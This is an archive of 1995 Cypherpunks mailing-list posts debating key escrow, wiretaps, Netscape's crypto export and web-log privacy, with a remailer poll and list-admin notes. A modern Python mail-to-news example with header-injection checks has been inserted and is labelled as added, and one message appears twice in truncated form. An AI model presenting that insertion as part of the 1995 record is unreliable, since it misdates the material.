Date: Tue, 12 Sep 95 18:41:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: GAK
In-Reply-To: <199509121457.KAA28748@panix.com>
Message-ID: <Pine.SOL.3.91.950912202830.20805B-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


What's technology got to do with it, in principle?  If
I write a letter in code, do I have to send the FBI the
key, just in case?

I don't see anything complicated about this--Director
Freeh wants more wiretapping ability than he's got now,
and I have no doubt that that expansion of FBI power
would be good for national security and law enforcement.

So would an FBI camcorder in every room of every house.
The question is where to draw the line, and I'd rather
let the lines draw themselves, as opposed to having 
citizens be compelled to draw them.  The telephone
system, Mr. Freeh's preferred analog, is inherently
susceptible to tapping, but what if it were not, and
every telephone were required to be equipped with
a government tap switch, subject to warrant, of course?

I don't think I'd like that.  Would you?

MacN

On Tue, 12 Sep 1995, Duncan Frissell wrote:

> At 09:25 PM 9/3/95 -0400, Brian Davis wrote:
> 
> >I, of course, know of the "dislike" of GAK here.  I am curious to know, 
> >however, if the "dislike" is because government would have access under 
> >any circumstances or if the primary worry is that government will cheat 
> >and get access when most would agree that they shouldn't (either by the 
> >judge "cheating" or a TLA stealing it).
> 
> 
> If we can deploy technologies to protect our freedom to communicate the way
> *we* choose to, then we have the right to do so.  Beyond rights, we have the
> power to do so --- which is worth even more.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anon-remailer@utopia.hacktic.nl)
Date: Wed, 20 Sep 95 17:27:34 PDT
To: cypherpunks@toad.com
Subject: RE: NETSCAPE TO PATCH SHAREWARE VERSION
Message-ID: <9509201550426518@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 12 Sep 1995 23:00:18 +0200
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Organization: Hack-Tic International, Inc.

>| Netscape said it received word last week that the State Department had 
>| cleared that version for release on the Net, but only within the U.S., 
>| owing to current export laws banning the export of encryption schemes 
>| stronger than 40 bits.  The company could provide no details by press 
>| time on how it would ensure that the 128-bit version wouldn't leak beyond 
>| U.S. borders.
>
>Ok, any bet on how long it will take?

It's already been exported.  Evidently, one of those who bought the commercial 

I note the site removed it, however, probably because Netscape Comm. Inc. reque






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mars.mcs.com>
Date: Tue, 12 Sep 95 19:19:34 PDT
To: cypherpunks@toad.com
Subject: generating hash.curve in eliptic.src
Message-ID: <Pine.3.89.9509122121.A19360-0100000@Mars.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


Among other comments, it was pointed out that I had not included 
"hash.curve".  To generate this file I did the following

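/* One-off generator for "hash.curve".  POINT, CURVE and the functions
   called here come from eliptic.src. */
int main(void)
{
	POINT	point;
	CURVE	curve;

	init_opt_math();
	init_rand();
	rand_curv_pnt(point,curve);	/* pick a random curve and point */
	save_curve("hash.curve",curve,point);	/* write them to hash.curve */
	close_rand();
	return 0;
}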

This was done during development and I forgot about it.  A simpler patch 
is to fix an error finding the file with a call to rand_curv_pnt to 
generate it.

Kind of interesting that way for hashing your secret key.  If everyone 
uses a different curve to generate their secret key, access to the 
machine is necessary to even begin to think about cracking any pass phrase.
Don't know if actually adds any security, but it is an interesting concept.

As for why I didn't put up a tar file, no particular reason.  It's source 
for a particular machine (MachTen on a Mac) and I figured every C 
compiler is different so some hacking will be required by anyone interested.
Once more bugs are fixed such as the one above, I'll put it up in a more
easily compilable form.

And thanks for the comments so far.  I'll do my best to keep up with them.

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 18:49:18 PDT
To: lindat@iquest.net (Linda Thompson, American Justice Federation)
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <m0ssbX5-00062kC@dorite1.iquest.net>
Message-ID: <199509130148.VAA16414@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Linda Thompson, American Justice Federation writes:
> During the Waco Hearings, Charles Schumer said he'd seen Foster's
> missing file and all it had in it was a memorandum about "Linda
> Thompson and THAT tape."

My, aren't the paranoid nutcases getting self important.

Please do not pollute cypherpunks with this crap.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Tue, 12 Sep 95 20:17:24 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Digital Fingerprinting
In-Reply-To: <Pine.D-G.3.91.950912175508.23949D-100000@dg.thepoint.net>
Message-ID: <Pine.SOL.3.91.950912221558.20805N-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Then, in W.Ky., as in Stockbridge, "You can get
anything you want..."? :)

MacN

On Tue, 12 Sep 1995, Brian Davis wrote:

> On Tue, 12 Sep 1995, Peter Trei wrote:
> 
> > > Finding the mail mixed in there is evidence that supports the "charge" 
> > > but surely can be rebutted.  When I was practicing in a small town c. 
> > > 1984, people would be summoned (sent a paper telling them to show up) to 
> > > court for illegal dumping if their mail was found with other trash, old 
> > > refrigerators, etc., in a creek somewhere.  Those charged could always 
> > > put on proof that Billy Bob's garbage service picked up their trash ...
> > 
> > > The sentence was almost always to go and pick up some multiple of the 
> > > garbage found and take it to the landfill.
> > 
> > This was Stockbridge, in MA, right :-?
> 
> No, it was in Western Kentucky with a week or two of a family's garbage 
> and maybe a worn out appliance or two.  No garbage pickup provided by the 
> county; private haulers expensive; dropping much at the landfill both 
> inconvenient and "unnecessary" given the availability of hard to find 
> valleys and creeks.
> 
> EBD
> 
>  
> > 	        That's what we did, and drove back to the church, had a
> > 	thanksgiving dinner that couldn't be beat, went to sleep and didn't
> > 	get up until the next morning, when we got a phone call from officer
> > 	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
> > 	half a ton of garbage, and just wanted to know if you had any
> > 	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> > 	lie, I put that envelope under that garbage."
> > (c) Arlo Guthrie
> > 
> > 
> >  
> > 
> > Peter Trei
> > Senior Software Engineer
> > Purveyor Development Team                                
> > Process Software Corporation
> > http://www.process.com
> > trei@process.com
> > 
> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame way! I get treated worse in person every day!!
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Sep 95 19:27:57 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <Pine.D-G.3.91.950912180024.23949E-100000@dg.thepoint.net>
Message-ID: <9509130226.AA22319@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Ooops.  Dog bites man.
>And do you really think the White House couldn't hire a couple of net 
>gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

Yes, they are far too cheap to hire, they would go off somewhere and smochze the 
info outa folks.

If they ever want an anonymous proxy server they are welcome to use ours.

Seriously folks I'm very pissed about the abuse of log file information. The 
Whitehouse restrict browsing privileges to a chosen few. The attempt to make a 
big deal out of it could have cost someone their job (it didn't in this case).

If we are serious about privacy I think we should be very clear that we respect 
the privacy of Whitehouse staffer and staffers in the Senate and House. I'm not 
being partisan about this, I have put a lot of effort into getting participation 
from the right as well as the left. I've just not been very successful in that 
area.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 12 Sep 95 19:56:29 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <9509130255.AA03446@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Seriously folks I'm very pissed about the abuse of log file information. The 

What abuse?  Is there an expectation of privacy in Web-world,
such that all users can honestly expect that a site is compelled
to keep its "visitor log" private?

Surely not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 12 Sep 95 14:00:35 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
Message-ID: <199509122100.XAA13066@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>| Netscape said it received word last week that the State Department had 
>| cleared that version for release on the Net, but only within the U.S., 
>| owing to current export laws banning the export of encryption schemes 
>| stronger than 40 bits.  The company could provide no details by press 
>| time on how it would ensure that the 128-bit version wouldn't leak beyond 
>| U.S. borders.
>
>Ok, any bet on how long it will take?

It's already been exported.  Evidently, one of those who bought the commercial version sent it to Europe as soon as it was out.

I note the site removed it, however, probably because Netscape Comm. Inc. requested that they do so.  Netscape generally objects to anyone else carrying their browser (.edu sites with prior permission excepted).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:33:54 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Digital Fingerprinting
In-Reply-To: <Pine.SOL.3.91.950912221558.20805N-100000@cavern>
Message-ID: <Pine.D-G.3.91.950912233806.4405B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Mac Norton wrote:

> Then, in W.Ky., as in Stockbridge, "You can get
> anything you want..."? :)

I'd stick with:
***********************************************
You can't always get what you want            1
but if you try
sometimes, sometimes you get what you need.   2
***********************************************

1 ability to dump garbage where you want
2 a better appreciation for the environment
:-)
EBD
 
> MacN
> 
> On Tue, 12 Sep 1995, Brian Davis wrote:
> 
> > On Tue, 12 Sep 1995, Peter Trei wrote:
> > 
> > > > Finding the mail mixed in there is evidence that supports the "charge" 
> > > > but surely can be rebutted.  When I was practicing in a small town c. 
> > > > 1984, people would be summoned (sent a paper telling them to show up) to 
> > > > court for illegal dumping if their mail was found with other trash, old 
> > > > refrigerators, etc., in a creek somewhere.  Those charged could always 
> > > > put on proof that Billy Bob's garbage service picked up their trash ...
> > > 
> > > > The sentence was almost always to go and pick up some multiple of the 
> > > > garbage found and take it to the landfill.
> > > 
> > > This was Stockbridge, in MA, right :-?
> > 
> > No, it was in Western Kentucky with a week or two of a family's garbage 
> > and maybe a worn out appliance or two.  No garbage pickup provided by the 
> > county; private haulers expensive; dropping much at the landfill both 
> > inconvenient and "unnecessary" given the availability of hard to find 
> > valleys and creeks.
> > 
> > EBD
> > 
> >  
> > > 	        That's what we did, and drove back to the church, had a
> > > 	thanksgiving dinner that couldn't be beat, went to sleep and didn't
> > > 	get up until the next morning, when we got a phone call from officer
> > > 	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
> > > 	half a ton of garbage, and just wanted to know if you had any
> > > 	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> > > 	lie, I put that envelope under that garbage."
> > > (c) Arlo Guthrie
> > > 
> > > 
> > >  
> > > 
> > > Peter Trei
> > > Senior Software Engineer
> > > Purveyor Development Team                                
> > > Process Software Corporation
> > > http://www.process.com
> > > trei@process.com
> > > 
> > 
> > Not a lawyer on the Net, although I play one in real life.
> > **********************************************************
> > Flame way! I get treated worse in person every day!!
> > 
> > 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:52:45 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <199509122307.QAA02486@mycroft.rand.org>
Message-ID: <Pine.D-G.3.91.950912234153.4405C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Jim Gillogly wrote:

> 
> > Brian Davis <bdavis@thepoint.net> writes:
> > No question.  Many high profile public corruption, Mafia, and high-level...
> > ...In our district, we managed to convict almost 20 people...
> > Particularly effective were the court-approved video and audio tapes of...
> 
> > I don't doubt that wiretaps may sometimes be abused despite the 
> > incredibly onerous review process, but they have positive aspects, too.
> 
> In how many of these cases did you fail to get the necessary information
> because of encryption?  Has this proportion been changing over the years?

I wasn't personally involved in any of the cases, but I suspect the 
answer re encryption is zero.  There was the time the FBI agent failed to 
push the record button, however.

My response was to the wiretap correlation to career-making cases.  I 
don't believe encryption is widespread enough yet to be a serious problem 
in the Title III area.  It is a potential problem, though, as encryption 
(rightfully) spreads.  The question I am debating with myself, with all 
of your help, is what the policy "ought to be."

Even if I ultimately come down in my own mind on the Cypherpunks side of 
the line, understand that, as far as policy goes (and, hell, everything 
else for that matter), I'm a nobody.  But I try to make up my own mind 
about what is right.

EBD


> > 	Jim Gillogly
> 	Hevensday, 21 Halimath S.R. 1995, 23:06
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 12 Sep 95 23:41:09 PDT
To: mix-l@jpunix.com
Subject: Mixmaster posting poll
Message-ID: <ac7c2d6a01021004664d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am about to release Mixmaster 2.0.2

This version will not contain the Socket code, but will have a bunch
of bug fixes. One of the things I am modifying is the posting to news
feature.

Mixmaster supports posting through either a local inews program, or
through a mail-to-news gateway.

There seem to be two flavors of the  latter:
        group.name@gateway.com
and
        mail2news@gateway.com
        Newsgroups: group.name

I really only want to support one of these standards. Which is more standard?
Is there a trend towards one becoming the dominant standard?

The next version should be out within 48 hours.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------
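
The two mail-to-news conventions named in the message above, built side by side. This is an added example, not part of the original post and not Mixmaster's code; the domain `gateway.example`, the function names and the newsgroup-name pattern are assumptions made for illustration.

```python
import re
from email.message import EmailMessage

# Conservative newsgroup-name pattern chosen for this example: at least two
# dot-separated components of lowercase letters, digits, '+', '-' or '_'.
# Anything else (spaces, '@', CR/LF) is refused before it reaches a header.
GROUP_RE = re.compile(r"[a-z0-9][a-z0-9+_-]*(?:\.[a-z0-9][a-z0-9+_-]*)+")


def check_group(name):
    """Return name unchanged if it is a plausible newsgroup name, else raise."""
    if not GROUP_RE.fullmatch(name):
        raise ValueError(f"rejected newsgroup name: {name!r}")
    return name


def address_style(group, gateway, subject, body):
    """Flavor 1: the group name is the local part, group.name@gateway."""
    msg = EmailMessage()
    msg["To"] = f"{check_group(group)}@{gateway}"
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def header_style(groups, gateway, subject, body):
    """Flavor 2: fixed mail2news@gateway address plus a Newsgroups: header."""
    msg = EmailMessage()
    msg["To"] = f"mail2news@{gateway}"
    # The Newsgroups header takes a comma-separated list, so one message can
    # name several groups; each name is validated on its own.
    msg["Newsgroups"] = ",".join(check_group(g) for g in groups)
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


if __name__ == "__main__":
    # Constructed sample values.
    print(address_style("alt.test", "gateway.example", "test", "hello\n"))
    print(header_style(["alt.test", "misc.test"], "gateway.example",
                       "test", "hello\n"))
```

In the first flavor the group name becomes part of an e-mail address, and in the second it becomes a header value, so in both cases a name taken from user input is checked before the message is built.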






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:47:39 PDT
To: Anonymous Remailing Service <nobody@armadillo.com>
Subject: Re: your mail
In-Reply-To: <199509122323.SAA23651@monad.armadillo.com>
Message-ID: <Pine.D-G.3.91.950912234803.4405E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Anonymous Remailing Service wrote:

> E. Brian sed:
> 
> 
> >Unbelievable!!!  To add to this distressing truth, I have learned that 
> >the White House also subscribes to a number of newspapers and periodicals 
> >which are reviewed for things of interest to the Administration and to 
> >the President. I I I I I I ammmmmmmmmm shocked!
> 
> mebbe tha Slickster just wants to know who orlin's "Deep Throat" is...
> Keep checkin' them fingerprints, Willie!

Certainly, Orlin's postings are of primary interest to everyone.  Perhaps 
the White House Staff needs a new fiction writer for the next State of 
the Union address!!  :-)

> >Ooops.  Dog bites man.
> >And do you really think the White House couldn't hire a couple of net 
> >gurus to sniff packets if they wanted to hide their "monitoring"(=reading).
> 
> who sez they dont post, too?
> heh

Your scoop related to net monitoring, not posting.  I anxiously await 
your sequel. And so what if they did post.  Maybe you are concerned about 
anonymous posting from the Administration???

And technically speaking, I guess, I am part of the Administration as an 
employee of the Executive Branch with some discretion in how I do my job. 
In the same sense, I was a part of Bush's Administration.

Having had two rounds of off topic posting on this thread, I intend to 
give you the last word.  I hope I can resist posting in response to what 
I am sure will be a thoughtful and enlightening reply.

Sauron

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:53:33 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: GAK
In-Reply-To: <Pine.SOL.3.91.950912202830.20805B-100000@cavern>
Message-ID: <Pine.D-G.3.91.950912235711.4405F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Mac Norton wrote:

> What's technology got to do with it, in principle?  If
> I write a letter in code, do I have to send the FBI the
> key, just in case?
...
The distinction, I think, is that for the past 40, 50, 60 ??? years, 
wiretapping has been available, recently only through court order 
(lawfully).  Encryption changes the status quo.

Change brings those who want to hasten it and those who want to stop it.  
The problem here, at least for me, is what *should* the policy be.  You 
(with one or two exceptions) have provided me with a lot of grist for the 
mill.  My thought process has changed dramatically on the issue, but is 
still fluid.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Sep 95 21:03:34 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <9509130402.AA22458@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>What abuse?  Is there an expectation of privacy in Web-world,
>such that all users can honestly expect that a site is compelled
>to keep its "visitor log" private?

Absolutely, just as there is an assumption that private email will not be 
distributed over USEnet.

There is a clear expectation of privacy. Just as the user of a USEnet server has 
an expectation of privacy. The question of what is legitimate to use log file 
data for is a very keenly debated one at W3 conferences.


	Phill H-B




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 21:38:18 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <Pine.D-G.3.91.950913000120.4405G-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Rich Salz wrote:

> >Seriously folks I'm very pissed about the abuse of log file information. The 
> 
> What abuse?  Is there an expectation of privacy in Web-world,
> such that all users can honestly expect that a site is compelled
> to keep its "visitor log" private?
> 
> Surely not.

I recall some bitter postings when a law enforcement agency got access to 
the log files of a Web page with information about a missing child.  
Perhaps that feeling can be felt on both sides of the fence. 

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 13 Sep 95 00:24:37 PDT
To: cypherpunks@toad.com
Subject: Community ConneXion & its new look
Message-ID: <199509130719.AAA12672@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Community ConneXion is in the process of upgrading its web
presence and image. If you'd like to keep abreast of developments,
check http://www.c2.org regularly-- most of the changes are in terms
of focus & marketing angle, but new services should be appearing soon
as well.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Sep 95 23:11:19 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <199509122051.QAA14953@pipe4.nyc.pipeline.com>
Message-ID: <9509130611.AA19154@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
>    In response to an audience question about wiretaps and
>    crypto, Mr. Michael Nelson of the White House said at the
>    NIST GAK meeting (paraphrased):
> 
>       We are not concerned with bad people using crypto among
>       themselves, we can handle that. We are more concerned
>       with their using crypto to communicate with regular
>       folks, to make legitimate arrangements -- finance,
>       supplies, travel, and so on -- for their nefarious
>       deeds. It's the intermix of the bad with the good that's
>       the problem.

Most of this reminds me of observations others have made (maybe here) about
LEAs' typical use of wiretapping, commercial records, etc. in gathering
evidence. It was said that criminals are often tracked/caught because of
communications with friends/relatives, and transactions with above-board
businesses to rent cars, buy plane tickets, etc. An argument against
allegations that free crypto is hazardous proceeds, then, by pointing out
that such contacts with *ahem* "regular folks" will be conducted in the
clear, or at least that one party will be cooperative with investigators.

Whether or not I encrypt my conversation with the Phil Zimmermann Travel
Agency, however, doesn't affect the ability or inclination of the PZTA to 
divulge its records to the TLAs. They would no longer beable (old a.r.k. joke)
to learn the contents of the communication directly from a wiretap. But if I
understand the technology correctly, they could certainly trace an encrypted
call to determine the identity of the other party. After that it's a trivial
matter to ask the other party to reveal transaction records. So I don't see
how the strong encryption of the "good" significantly interferes with The
Legitimate Needs of Law Enforcement in and of itself.   

(As an aside, the situation may get murky when the Phil Zimmermann Travel
 Agency carries out transactions over the net with cryptographically sound
 digital pseudonyms. Depending on the circumstances, true ecash with
 reasonable payor anonymity may also need to be involved. This is where I
 suspect untraceable transactions make the LEAs uncomfortable: untraceable
 garden variety transactions)

>    Maybe someone else at the meeting heard this differently
>    and will comment, but this seems to mean that the Feds can
>    track, and maybe crack, the crypto-intercomm of "bad
>    people" so long as it is not buried in a torrent of public
>    crypto use. And not commingled with lawful, ECPA-
>    protected(?), communication.

Hmmm. The bit about "the intermixing of bad and good" is puzzling. "Bad"
and "good" seem to be defined in terms of the identities of the parties to
a communication. Figuring those out isn't hindered by strong crypto per se.
I remain unclear as to the source of their expressed concern.

Your paraphrase of Nelson's statement strikes me as remarkable. Doesn't "we
are not concerned with bad people using crypto among themselves" run
completely counter to all the hyperbole about terrorists planning OKC II
with PGP ?  Does anyone have an exact quotation ?  At any rate, sign me up as
a "bad person"....

Incidentally, recent events in France highlight the absurdity of Les Quatres
Chevaliers. The French government's crypto registration requirements don't 
seem to have been much of a deterrent to the serial Metro bombers -- quelle 
surprise !  I hope someone in Washington is paying attention.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Wed, 13 Sep 95 05:39:28 PDT
To: cypherpunks@toad.com
Subject: ADMIN: How to find out if you have been culled from the list
Message-ID: <9509131238.AA22758@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  If I (or any software I write) remove a user from the
<cypherpunks@toad.com> list the user's entry now gets appended to the
culled.users file.  Since I was keeping a list anyway, I have set it
up so that anyone can email/download the list of recently culled
cypherpunks via majordomo.

  If you stop getting your CP drug for too long, before sending a note
to the list(shame!) ask for this file to see if I culled you.  If you
forget how to get a file send a help message to <majordomo@toad.com>.
  Here is a quick (emacs) example of how to get the file:

	To: majordomo@toad.com
	--text follows this line--
	get cypherpunks culled.users
	end

and the file will show up soon.  This is a very boring file (dates and
email addresses).
  You might want to save this message away, so you will have it to
reference if need be.
  Now, you get back to writing that great crypto/UI package!

		||ugh Daniel
		Sometimes Postmaster
		Always Majordomo Potty Trainer
		<hugh@toad.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 13 Sep 95 04:58:40 PDT
To: cypherpunks@toad.com
Subject: Whitehouse "dissident
In-Reply-To: <8B0F439.000504F727.uuout@the-matrix.com>
Message-ID: <8B10180.000504F829.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM|We don't believe in "security through obscurity," do we? The notion that we
   |are "safe" if the White House, or (horrors!) Janet Reno herself, are not
   |reading our list or the Web sites on various issues, is the same kind of
   |security the ostrich thinks he has with his head in the sand and his butt
   |in the air.

        Maybe so, but we don't have to like it.  And I don't.  But
        it's not so much their access, per se, that I object to.
        It's their potential intentions, all things considered, and
        the fact that they aren't at all open about such monitoring.

TCM|If you want to be unheard by the Feds, and the White House, and the FBI,
   |and GCHQ, and Mossad, etc., then don't post publicly. If you want your
   |own access to Web sites kept private, push for the development of Web
   |proxies ("Web remailers").

        Mix or Flame is fine. :)


        furi@the-matrix.com    pgp-public-key@demon.co.uk    C1225CE1
  RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Sep 95 07:35:26 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509131434.HAA09918@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by futplex@pseudonym.com (Futplex) on Wed, 13 
Sep  2:11 AM

>Your paraphrase of Nelson's statement strikes me as 
>remarkable. Doesn't "we  are not concerned with bad 
>people using crypto among themselves" run  completely 
>counter to all the hyperbole about terrorists planning 
>OKC II  with PGP ?  Does anyone have an exact quotation 
>?  At any rate, sign me up as  a "bad person"....

I think this is setting up the rationale for software key escrow.  One of
the big loopholes in this idea has always been that it would be easy for
bad guys to superencrypt or otherwise bypass the legal encryption.  The
response has been that the systems will be designed so that compliant
systems will not interoperate with rogue systems.  And the counter-response
to that was that criminals (and privacy advocates) would use software
which would operate compliantly with conventional programs and maintain
privacy when talking to other rogue programs.

This new line will be used to respond to this argument, I think.  Even if
it is admitted that there is no way for the government to be able to tell
what the criminals say amongst themselves, it will still be useful to be
able to tell what they say to other people.  Therefore software key
escrow will be argued to still be useful even though it can be defeated.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 13 Sep 95 08:01:18 PDT
To: bdavis@thepoint.net
Subject: Re: Digital Fingerprinting
Message-ID: <9509131457.AA17323@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Then, in W.Ky., as in Stockbridge, "You can get
> > anything you want..."? :)
> 
> I'd stick with:
> ***********************************************
> You can't always get what you want            1
> but if you try
> sometimes, sometimes you get what you need.   2
> ***********************************************
> 
> 1 ability to dump garbage where you want
> 2 a better appreciation for the environment
> :-)


Why do I feel like I'm sitting on the group W bench?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 13 Sep 95 08:42:57 PDT
To: adam@bwh.harvard.edu
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <9509131539.AA17341@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Sure.  I'll respect their privacy as much as they, and the
> organizations they oversee, respect mine.  I'll use as the
> respresentative organizations the IRS and the Social Security
> Administration, which respects my pricvacy so much that they use
> prison inmates to process paperwork.
> 
> 	If I was in a nasty mood, I'd add the USPS.
> 
> 	Sarcasm aside, they show no interest in other people's
> privacy.  Why should we go out of our way to do anything but show them
> how bad the situation is?
> 
> Adam


Oh please!  Some clerk browses the internet and you don't want to respect
their privacy because of the IRS?  This makes sense how?  I suppose that
you're going to dig up information about me and spread it around the 
internet because you have issues about the company I work for?

Suppose someone did something bad to you and justified it by saying that
harvard is an elitist school that once did something bad to their uncle.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Sep 95 05:44:35 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509131244.IAA07887@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by futplex@pseudonym.com (Futplex) on Wed, 13 
Sep  2:11 AM

>Your paraphrase of Nelson's statement strikes me as 
>remarkable. Doesn't "we  are not concerned with bad 
